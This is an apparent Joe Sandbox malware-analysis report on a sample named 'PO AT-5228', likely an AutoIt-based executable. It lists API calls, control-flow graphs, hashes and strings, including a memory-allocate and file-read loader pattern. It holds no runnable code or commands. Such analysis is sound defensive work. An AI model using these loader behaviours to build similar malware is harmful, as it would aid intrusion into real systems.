                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharUpper
                                                                                        • String ID:
                                                                                        • API String ID: 3964851224-0
                                                                                        • Opcode ID: 49e5adb69b024b5bc3c7d4952835fc65f0d1612366d2bae498cde056b937476a
                                                                                        • Instruction ID: a0e8fa7361057fb15949158474d31337158e379a2f73cf277e674e9b0f31d61c
                                                                                        • Opcode Fuzzy Hash: 49e5adb69b024b5bc3c7d4952835fc65f0d1612366d2bae498cde056b937476a
                                                                                        • Instruction Fuzzy Hash: B99268706083419FD724DF18C480B6ABBE1FF88704F14889DE9AA8B362D775ED45DB92
                                                                                        APIs
                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B6E959
                                                                                        • timeGetTime.WINMM ref: 00B6EBFA
                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B6ED2E
                                                                                        • TranslateMessage.USER32(?), ref: 00B6ED3F
                                                                                        • DispatchMessageW.USER32(?), ref: 00B6ED4A
                                                                                        • LockWindowUpdate.USER32(00000000), ref: 00B6ED79
                                                                                        • DestroyWindow.USER32 ref: 00B6ED85
                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B6ED9F
                                                                                        • Sleep.KERNEL32(0000000A), ref: 00BD5270
                                                                                        • TranslateMessage.USER32(?), ref: 00BD59F7
                                                                                        • DispatchMessageW.USER32(?), ref: 00BD5A05
                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00BD5A19
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                                                        • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                                        • API String ID: 2641332412-570651680
                                                                                        • Opcode ID: a0f4b0109b8adbdb3572b89d641e6bb3f622bdb2733a869ff9f1b2ce13749109
                                                                                        • Instruction ID: 397e38bddd8a11f5fa72d7381fa9f24a6c8beaf0595459d85472ae51191ad1e9
                                                                                        • Opcode Fuzzy Hash: a0f4b0109b8adbdb3572b89d641e6bb3f622bdb2733a869ff9f1b2ce13749109
                                                                                        • Instruction Fuzzy Hash: 5962B470504340DFEB24DF24C885BAAB7E4FF54304F1849AEF95A8B292DBB5D844CB52
                                                                                        APIs
                                                                                        • ___createFile.LIBCMT ref: 00B95EC3
                                                                                        • ___createFile.LIBCMT ref: 00B95F04
                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00B95F2D
                                                                                        • __dosmaperr.LIBCMT ref: 00B95F34
                                                                                        • GetFileType.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00B95F47
                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00B95F6A
                                                                                        • __dosmaperr.LIBCMT ref: 00B95F73
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00B95F7C
                                                                                        • __set_osfhnd.LIBCMT ref: 00B95FAC
                                                                                        • __lseeki64_nolock.LIBCMT ref: 00B96016
                                                                                        • __close_nolock.LIBCMT ref: 00B9603C
                                                                                        • __chsize_nolock.LIBCMT ref: 00B9606C
                                                                                        • __lseeki64_nolock.LIBCMT ref: 00B9607E
                                                                                        • __lseeki64_nolock.LIBCMT ref: 00B96176
                                                                                        • __lseeki64_nolock.LIBCMT ref: 00B9618B
                                                                                        • __close_nolock.LIBCMT ref: 00B961EB
                                                                                          • Part of subcall function 00B8EA9C: CloseHandle.KERNEL32(00000000,00C0EEF4,00000000,?,00B96041,00C0EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00B8EAEC
                                                                                          • Part of subcall function 00B8EA9C: GetLastError.KERNEL32(?,00B96041,00C0EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00B8EAF6
                                                                                          • Part of subcall function 00B8EA9C: __free_osfhnd.LIBCMT ref: 00B8EB03
                                                                                          • Part of subcall function 00B8EA9C: __dosmaperr.LIBCMT ref: 00B8EB25
                                                                                          • Part of subcall function 00B87C0E: __getptd_noexit.LIBCMT ref: 00B87C0E
                                                                                        • __lseeki64_nolock.LIBCMT ref: 00B9620D
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00B96342
                                                                                        • ___createFile.LIBCMT ref: 00B96361
                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00B9636E
                                                                                        • __dosmaperr.LIBCMT ref: 00B96375
                                                                                        • __free_osfhnd.LIBCMT ref: 00B96395
                                                                                        • __invoke_watson.LIBCMT ref: 00B963C3
                                                                                        • __wsopen_helper.LIBCMT ref: 00B963DD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                                                        • String ID: @
                                                                                        • API String ID: 3896587723-2766056989
                                                                                        • Opcode ID: 1faf906c824a9425d5655e4c74f0204758151a44335cf81999bd3869efc226f0
                                                                                        • Instruction ID: 7b48c4b3cda3e8ac207b031daccb322435c15d7cd01a8d687cb58cf51a2ddcc9
                                                                                        • Opcode Fuzzy Hash: 1faf906c824a9425d5655e4c74f0204758151a44335cf81999bd3869efc226f0
                                                                                        • Instruction Fuzzy Hash: 1922267190460A9BEF2A9F68DC85BBD7BE1EF11324F2442F9E9219B2E2C7358D40C751
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: __getptd_noexit
                                                                                        • String ID:
                                                                                        • API String ID: 3074181302-0
                                                                                        • Opcode ID: 35a8ade7738f4a8097f707ffa563ed86f3a3d57f4f5c7cd50072d1208bc54eff
                                                                                        • Instruction ID: 48e44fe51c7474c9cb970be9182c6897f1208b727a56841905e590a53af4f384
                                                                                        • Opcode Fuzzy Hash: 35a8ade7738f4a8097f707ffa563ed86f3a3d57f4f5c7cd50072d1208bc54eff
                                                                                        • Instruction Fuzzy Hash: A732F570A04247DFDB21BF68D880BBD7BE1EF55314F2841EAE855AF2A2D7709842C761

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • _wcscpy.LIBCMT ref: 00BAFA96
                                                                                        • _wcschr.LIBCMT ref: 00BAFAA4
                                                                                        • _wcscpy.LIBCMT ref: 00BAFABB
                                                                                        • _wcscat.LIBCMT ref: 00BAFACA
                                                                                        • _wcscat.LIBCMT ref: 00BAFAE8
                                                                                        • _wcscpy.LIBCMT ref: 00BAFB09
                                                                                        • __wsplitpath.LIBCMT ref: 00BAFBE6
                                                                                        • _wcscpy.LIBCMT ref: 00BAFC0B
                                                                                        • _wcscpy.LIBCMT ref: 00BAFC1D
                                                                                        • _wcscpy.LIBCMT ref: 00BAFC32
                                                                                        • _wcscat.LIBCMT ref: 00BAFC47
                                                                                        • _wcscat.LIBCMT ref: 00BAFC59
                                                                                        • _wcscat.LIBCMT ref: 00BAFC6E
                                                                                          • Part of subcall function 00BABFA4: _wcscmp.LIBCMT ref: 00BAC03E
                                                                                          • Part of subcall function 00BABFA4: __wsplitpath.LIBCMT ref: 00BAC083
                                                                                          • Part of subcall function 00BABFA4: _wcscpy.LIBCMT ref: 00BAC096
                                                                                          • Part of subcall function 00BABFA4: _wcscat.LIBCMT ref: 00BAC0A9
                                                                                          • Part of subcall function 00BABFA4: __wsplitpath.LIBCMT ref: 00BAC0CE
                                                                                          • Part of subcall function 00BABFA4: _wcscat.LIBCMT ref: 00BAC0E4
                                                                                          • Part of subcall function 00BABFA4: _wcscat.LIBCMT ref: 00BAC0F7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                                                        • String ID: >>>AUTOIT SCRIPT<<<
                                                                                        • API String ID: 2955681530-2806939583
                                                                                        • Opcode ID: bce6c7de9f92e7dc292005bde4c26b8cf3ffbd252ae78ae764624b5acfd5838f
                                                                                        • Instruction ID: 36543d71b3081a882a2cda063e31392378a3fdd637edfd151cceeace6ddd93fc
                                                                                        • Opcode Fuzzy Hash: bce6c7de9f92e7dc292005bde4c26b8cf3ffbd252ae78ae764624b5acfd5838f
                                                                                        • Instruction Fuzzy Hash: 3691B272508305AFCB20FF54C851FAAB3E8FF55310F0448A9F959972A1DB35EA48CB96

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00B63F86
                                                                                        • RegisterClassExW.USER32(00000030), ref: 00B63FB0
                                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00B63FC1
                                                                                        • InitCommonControlsEx.COMCTL32(?), ref: 00B63FDE
                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00B63FEE
                                                                                        • LoadIconW.USER32(000000A9), ref: 00B64004
                                                                                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00B64013
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                        • API String ID: 2914291525-1005189915
                                                                                        • Opcode ID: 497e97b8044c233628e51067f367e9539b232907738a5d9d6a6fdf9e8de2f0e2
                                                                                        • Instruction ID: 97ab610db445df7822958ef78efe716a4f242b120d901e3c2fdda30600e71fbb
                                                                                        • Opcode Fuzzy Hash: 497e97b8044c233628e51067f367e9539b232907738a5d9d6a6fdf9e8de2f0e2
                                                                                        • Instruction Fuzzy Hash: CB21F7B5910348AFDB10DFA4E889BCDBBB5FB18700F04421AFA11AB6A0DBB105458F90

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1006 babfa4-bac054 call b8f8a0 call b7f4ea call b647b7 call babdb4 call b64517 call b815e3 1019 bac05a-bac061 call bac56d 1006->1019 1020 bac107-bac10e call bac56d 1006->1020 1025 bac110-bac112 1019->1025 1026 bac067-bac105 call b81dfc call b80d23 call b80cf4 call b81dfc call b80cf4 * 2 1019->1026 1020->1025 1027 bac117 1020->1027 1029 bac367-bac368 1025->1029 1028 bac11a-bac1d6 call b644ed * 8 call bac71a call b83499 1026->1028 1027->1028 1065 bac1d8-bac1da 1028->1065 1066 bac1df-bac1fa call babdf8 1028->1066 1033 bac385-bac393 call b647e2 1029->1033 1065->1029 1069 bac28c-bac298 call b835e4 1066->1069 1070 bac200-bac208 1066->1070 1077 bac29a-bac2a9 DeleteFileW 1069->1077 1078 bac2ae-bac2b2 1069->1078 1071 bac20a-bac20e 1070->1071 1072 bac210 1070->1072 1074 bac215-bac233 call b644ed 1071->1074 1072->1074 1085 bac25d-bac273 call bab791 call b82aae 1074->1085 1086 bac235-bac23b 1074->1086 1077->1029 1080 bac2b8-bac32f call bac81d call bac845 call bab965 1078->1080 1081 bac342-bac356 CopyFileW 1078->1081 1083 bac36a-bac380 DeleteFileW call bac6d9 1080->1083 1102 bac331-bac340 DeleteFileW 1080->1102 1081->1083 1084 bac358-bac365 DeleteFileW 1081->1084 1083->1033 1084->1029 1099 bac278-bac283 1085->1099 1087 bac23d-bac250 call babf2e 1086->1087 1097 bac252-bac25b 1087->1097 1097->1085 1099->1070 1101 bac289 1099->1101 1101->1069 1102->1029
                                                                                        APIs
                                                                                          • Part of subcall function 00BABDB4: __time64.LIBCMT ref: 00BABDBE
                                                                                          • Part of subcall function 00B64517: _fseek.LIBCMT ref: 00B6452F
                                                                                        • __wsplitpath.LIBCMT ref: 00BAC083
                                                                                          • Part of subcall function 00B81DFC: __wsplitpath_helper.LIBCMT ref: 00B81E3C
                                                                                        • _wcscpy.LIBCMT ref: 00BAC096
                                                                                        • _wcscat.LIBCMT ref: 00BAC0A9
                                                                                        • __wsplitpath.LIBCMT ref: 00BAC0CE
                                                                                        • _wcscat.LIBCMT ref: 00BAC0E4
                                                                                        • _wcscat.LIBCMT ref: 00BAC0F7
                                                                                        • _wcscmp.LIBCMT ref: 00BAC03E
                                                                                          • Part of subcall function 00BAC56D: _wcscmp.LIBCMT ref: 00BAC65D
                                                                                          • Part of subcall function 00BAC56D: _wcscmp.LIBCMT ref: 00BAC670
                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00BAC2A1
                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00BAC338
                                                                                        • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00BAC34E
                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00BAC35F
                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00BAC371
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                                                        • String ID:
                                                                                        • API String ID: 2378138488-0
                                                                                        • Opcode ID: a6d9755e3a405eb314a99bd89e55aada31577b72995d3e1d34e91e965169a16b
                                                                                        • Instruction ID: 99dbe71ec666097dbfe7ca37a895fd8a467c1470a2cc95af079509467a1843e9
                                                                                        • Opcode Fuzzy Hash: a6d9755e3a405eb314a99bd89e55aada31577b72995d3e1d34e91e965169a16b
                                                                                        • Instruction Fuzzy Hash: 1EC109B1A00219AADF11DF95CC81EEEBBFDEF59310F0040EAE609E6151DB749A448F65

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1170 b63742-b63762 1172 b63764-b63767 1170->1172 1173 b637c2-b637c4 1170->1173 1174 b637c8 1172->1174 1175 b63769-b63770 1172->1175 1173->1172 1176 b637c6 1173->1176 1180 b637ce-b637d1 1174->1180 1181 bd1e00-bd1e2e call b62ff6 call b7e312 1174->1181 1177 b63776-b6377b 1175->1177 1178 b6382c-b63834 PostQuitMessage 1175->1178 1179 b637ab-b637b3 DefWindowProcW 1176->1179 1185 bd1e88-bd1e9c call ba4ddd 1177->1185 1186 b63781-b63783 1177->1186 1187 b637f2-b637f4 1178->1187 1188 b637b9-b637bf 1179->1188 1182 b637f6-b6381d SetTimer RegisterWindowMessageW 1180->1182 1183 b637d3-b637d4 1180->1183 1216 bd1e33-bd1e3a 1181->1216 1182->1187 1192 b6381f-b6382a CreatePopupMenu 1182->1192 1189 b637da-b637ed KillTimer call b63847 call b6390f 1183->1189 1190 bd1da3-bd1da6 1183->1190 1185->1187 1209 bd1ea2 1185->1209 1193 b63836-b63840 call b7eb83 1186->1193 1194 b63789-b6378e 1186->1194 1187->1188 1189->1187 1202 bd1ddc-bd1dfb MoveWindow 1190->1202 1203 bd1da8-bd1daa 1190->1203 1192->1187 1210 b63845 1193->1210 1198 bd1e6d-bd1e74 1194->1198 1199 b63794-b63799 1194->1199 1198->1179 1205 bd1e7a-bd1e83 call b9a5f3 1198->1205 1207 bd1e58-bd1e68 call ba55bd 1199->1207 1208 b6379f-b637a5 1199->1208 1202->1187 1211 bd1dac-bd1daf 1203->1211 1212 bd1dcb-bd1dd7 SetFocus 1203->1212 1205->1179 1207->1187 1208->1179 1208->1216 1209->1179 1210->1187 1211->1208 1217 bd1db5-bd1dc6 call b62ff6 1211->1217 1212->1187 1216->1179 1221 bd1e40-bd1e53 call b63847 call b64ffc 1216->1221 1217->1187 1221->1179
                                                                                        APIs
                                                                                        • DefWindowProcW.USER32(?,?,?,?), ref: 00B637B3
                                                                                        • KillTimer.USER32(?,00000001), ref: 00B637DD
                                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00B63800
                                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00B6380B
                                                                                        • CreatePopupMenu.USER32 ref: 00B6381F
                                                                                        • PostQuitMessage.USER32(00000000), ref: 00B6382E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                        • String ID: TaskbarCreated
                                                                                        • API String ID: 129472671-2362178303
                                                                                        • Opcode ID: 9202316e37558b4d2ac78ce4d98026b2d051d1b18c4b119fe9f0c5d540898112
                                                                                        • Instruction ID: ff1bcafb30368b54bdc8ecb2c6b7d560429a5e1c106187e9951c198c350d6f87
                                                                                        • Opcode Fuzzy Hash: 9202316e37558b4d2ac78ce4d98026b2d051d1b18c4b119fe9f0c5d540898112
                                                                                        • Instruction Fuzzy Hash: FA416AF1214289AFDB205F28EC8AFBE36D5FB50B00F0801A9FD06D7591DF699E509761

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00B63E79
                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00B63E88
                                                                                        • LoadIconW.USER32(00000063), ref: 00B63E9E
                                                                                        • LoadIconW.USER32(000000A4), ref: 00B63EB0
                                                                                        • LoadIconW.USER32(000000A2), ref: 00B63EC2
                                                                                          • Part of subcall function 00B64024: LoadImageW.USER32(00B60000,00000063,00000001,00000010,00000010,00000000), ref: 00B64048
                                                                                        • RegisterClassExW.USER32(?), ref: 00B63F30
                                                                                          • Part of subcall function 00B63F53: GetSysColorBrush.USER32(0000000F), ref: 00B63F86
                                                                                          • Part of subcall function 00B63F53: RegisterClassExW.USER32(00000030), ref: 00B63FB0
                                                                                          • Part of subcall function 00B63F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00B63FC1
                                                                                          • Part of subcall function 00B63F53: InitCommonControlsEx.COMCTL32(?), ref: 00B63FDE
                                                                                          • Part of subcall function 00B63F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00B63FEE
                                                                                          • Part of subcall function 00B63F53: LoadIconW.USER32(000000A9), ref: 00B64004
                                                                                          • Part of subcall function 00B63F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00B64013
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                        • String ID: #$0$AutoIt v3
                                                                                        • API String ID: 423443420-4155596026
                                                                                        • Opcode ID: 83ef76d6117f36245a7026c2b5d0f00bdf80634f0f25c76d6ca7246e0e77ff39
                                                                                        • Instruction ID: caa822d97429b3423788e2d144f9744dc22fb9d0a2a7f5f57f5ca110e5d2f945
                                                                                        • Opcode Fuzzy Hash: 83ef76d6117f36245a7026c2b5d0f00bdf80634f0f25c76d6ca7246e0e77ff39
                                                                                        • Instruction Fuzzy Hash: 79216DB0D10304AFCB20DFA9EC46B9DBFF5FB58720F04416AEA04A76A0D7B54A518F95

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1234 195fc80-195fd2e call 195d6c0 1237 195fd35-195fd5b call 1960b90 CreateFileW 1234->1237 1240 195fd62-195fd72 1237->1240 1241 195fd5d 1237->1241 1249 195fd74 1240->1249 1250 195fd79-195fd93 VirtualAlloc 1240->1250 1242 195fead-195feb1 1241->1242 1243 195fef3-195fef6 1242->1243 1244 195feb3-195feb7 1242->1244 1246 195fef9-195ff00 1243->1246 1247 195fec3-195fec7 1244->1247 1248 195feb9-195febc 1244->1248 1253 195ff55-195ff6a 1246->1253 1254 195ff02-195ff0d 1246->1254 1255 195fed7-195fedb 1247->1255 1256 195fec9-195fed3 1247->1256 1248->1247 1249->1242 1251 195fd95 1250->1251 1252 195fd9a-195fdb1 ReadFile 1250->1252 1251->1242 1257 195fdb3 1252->1257 1258 195fdb8-195fdf8 VirtualAlloc 1252->1258 1261 195ff6c-195ff77 VirtualFree 1253->1261 1262 195ff7a-195ff82 1253->1262 1259 195ff11-195ff1d 1254->1259 1260 195ff0f 1254->1260 1263 195fedd-195fee7 1255->1263 1264 195feeb 1255->1264 1256->1255 1257->1242 1265 195fdff-195fe1a call 1960de0 1258->1265 1266 195fdfa 1258->1266 1267 195ff31-195ff3d 1259->1267 1268 195ff1f-195ff2f 1259->1268 1260->1253 1261->1262 1263->1264 1264->1243 1274 195fe25-195fe2f 1265->1274 1266->1242 1271 195ff3f-195ff48 1267->1271 1272 195ff4a-195ff50 1267->1272 1270 195ff53 1268->1270 1270->1246 1271->1270 1272->1270 1275 195fe31-195fe60 call 1960de0 1274->1275 1276 195fe62-195fe76 call 1960bf0 1274->1276 1275->1274 1281 195fe78 1276->1281 1282 195fe7a-195fe7e 1276->1282 1281->1242 1284 195fe80-195fe84 CloseHandle 1282->1284 1285 195fe8a-195fe8e 1282->1285 1284->1285 1286 195fe90-195fe9b VirtualFree 1285->1286 1287 195fe9e-195fea7 1285->1287 1286->1287 1287->1237 1287->1242
                                                                                        APIs
                                                                                        • CreateFileW.KERNEL32(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 0195FD51
                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0195FF77
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1694924142.000000000195D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0195D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_195d000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateFileFreeVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 204039940-0
                                                                                        • Opcode ID: ed516440ab75e0c1ded8a7b1870b24392b753ad5cf7d4aa929dd61e32643855c
                                                                                        • Instruction ID: 3504a23be46f15a932d37726fbc2fad10db804d203d3f80983ffa05f105f3f5b
                                                                                        • Opcode Fuzzy Hash: ed516440ab75e0c1ded8a7b1870b24392b753ad5cf7d4aa929dd61e32643855c
